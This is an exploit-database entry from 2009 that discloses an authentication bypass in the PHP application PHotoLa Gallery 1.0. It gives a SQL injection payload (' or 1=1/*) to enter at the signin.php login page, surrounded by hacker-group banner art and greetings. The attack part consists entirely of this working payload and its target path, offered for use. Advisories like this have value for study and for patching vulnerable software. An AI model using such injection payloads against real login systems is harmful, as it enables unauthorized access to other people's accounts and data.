PHotoLa Gallery 1.0 - Authentication Bypass

EDB-ID:

9385

CVE:

N/A


Platform:

PHP

Published:

2009-08-07

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  PHotoLa Gallery <= 1.0 (Auth Bypass) SQL injection Valunrability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:             [ PHotoLa Gallery ]
    [»] Language:           [ PHP ]
    [»] home:               [ http://www.photola.co.uk ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [»] [PaTH]/signin.php


    [»] Exploit : 'or 1=1/*

 

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-07]